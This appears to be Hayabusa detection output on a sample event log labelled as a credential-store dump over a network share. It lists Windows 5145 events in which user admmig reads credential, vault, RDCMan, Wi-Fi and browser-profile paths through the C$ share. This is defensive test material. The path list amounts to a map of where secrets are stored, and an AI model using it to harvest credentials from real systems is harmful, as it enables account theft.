2021-12-12 20:53:14.584 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ServiceProfiles\ADSync\AppData\Local\Microsoft\Credentials | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:14.584 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\AppData\Roaming\Microsoft\Credentials | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:14.601 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\AppData\Local\Microsoft\Remote Desktop Connection Manager\RDCMan.settings | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:14.601 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\AppData\Local\Microsoft\Credentials | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:14.601 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ServiceProfiles\ADSync\AppData\Local\Microsoft\Credentials | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:14.601 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\AppData\Roaming\Microsoft\Credentials | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:14.616 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\AppData\Local\Microsoft\Remote Desktop Connection Manager\RDCMan.settings | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:14.616 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\AppData\Local\Microsoft\Credentials | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:14.616 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ServiceProfiles\ADSync\AppData\Local\Microsoft\Credentials | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:14.631 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\AppData\Roaming\Microsoft\Credentials | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:14.631 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\AppData\Local\Microsoft\Remote Desktop Connection Manager\RDCMan.settings | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:14.631 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\AppData\Local\Microsoft\Credentials | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:14.647 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: 
Windows\ServiceProfiles\ADSync\AppData\Local\Microsoft\Credentials | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:14.647 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\AppData\Roaming\Microsoft\Credentials | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:14.647 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\AppData\Local\Microsoft\Remote Desktop Connection Manager\RDCMan.settings | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:14.663 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\config\systemprofile\AppData\Local\Microsoft\Credentials | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:14.666 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share 
File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ServiceProfiles\ADSync\AppData\Local\Microsoft\Credentials | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:14.666 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\ADSync\AppData\Local\Microsoft\Credentials | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:14.666 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: ProgramData\Microsoft\Wlansvc\Profiles\Interfaces | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:14.682 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\AppData\Local\Microsoft\Vault | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:14.682 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network 
Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\AppData\Local\Microsoft\Vault\4BF4C442-9B8A-41A0-B380-DD4A704DDB28\Policy.vpol | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:14.702 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\AppData\Local\Microsoft\Vault\4BF4C442-9B8A-41A0-B380-DD4A704DDB28 | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:14.702 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\AppData\Local\Microsoft\Vault | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:14.702 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: ProgramData\Microsoft\Vault | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:14.718 
+09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: ProgramData\Microsoft\Vault\AC658CB4-9126-49BD-B877-31EEDAB3F204\Policy.vpol | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:15.562 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: ProgramData\Microsoft\Vault\AC658CB4-9126-49BD-B877-31EEDAB3F204 | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:15.577 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: ProgramData\Microsoft\Vault\AC658CB4-9126-49BD-B877-31EEDAB3F204\154E23D0-C644-4E6F-8CE6-5069272F999F.vsch | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:15.593 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: ProgramData\Microsoft\Vault\AC658CB4-9126-49BD-B877-31EEDAB3F204\2F1A6504-0641-44CF-8BB5-3612D865F2E5.vsch | IP Addr: 10.23.123.11 | LID: 
0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:15.593 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: ProgramData\Microsoft\Vault\AC658CB4-9126-49BD-B877-31EEDAB3F204\3CCD5499-87A8-4B10-A215-608888DD3B55.vsch | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:15.608 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\system32\config\systemprofile\AppData\Local\Microsoft\Vault | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:15.608 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\AppData\Local\Google\Chrome\User Data | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:15.624 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: 
Users\Administrator\AppData\Local\Google\Chrome\User Data\Default | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:15.624 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\AppData\Local\Google\Chrome\User Data\Default | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:15.640 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\AppData\Local\Google\Chrome\User Data | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:15.642 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\AppData\Local\Google\Chrome\User Data\Default | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:15.642 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share 
Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\AppData\Local\Google\Chrome\User Data\Default | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:15.658 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\AppData\Local\Google\Chrome\User Data | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:15.658 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\AppData\Local\Google\Chrome\User Data\Default | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:15.658 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\AppData\Local\Google\Chrome\User Data\Default | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:15.673 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share 
File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\AppData\Local\Google\Chrome\User Data | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:15.673 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\AppData\Local\Google\Chrome\User Data\Default | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:15.673 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\AppData\Local\Google\Chrome\User Data\Default | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:15.673 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\AppData\Local\Google\Chrome\User Data | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:15.689 
+09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\AppData\Local\Google\Chrome\User Data\Default | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:15.689 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\AppData\Local\Google\Chrome\User Data\Default | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:15.689 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\AppData\Local\Google\Chrome\User Data | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:15.705 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\AppData\Local\Google\Chrome\User Data\Default | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network 
share.evtx 2021-12-12 20:53:15.705 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\AppData\Local\Google\Chrome\User Data\Default | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:15.705 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\AppData\Local\Google\Chrome\User Data | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:15.720 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\AppData\Local\Google\Chrome\User Data\Default | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:15.720 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\AppData\Local\Google\Chrome\User Data\Default | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user 
file-credentials-browser dump via network share.evtx 2021-12-12 20:53:15.720 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\AppData\Roaming\Mozilla\Firefox\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:15.736 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:15.736 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\AppData\Roaming\8pecxstudios\Cyberfox\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:15.736 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\AppData\Roaming\Comodo\IceDragon\profiles.ini | IP Addr: 10.23.123.11 | LID: 
0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:15.736 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\AppData\Roaming\K-Meleon\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:15.751 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\AppData\Roaming\Mozilla\icecat\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:15.751 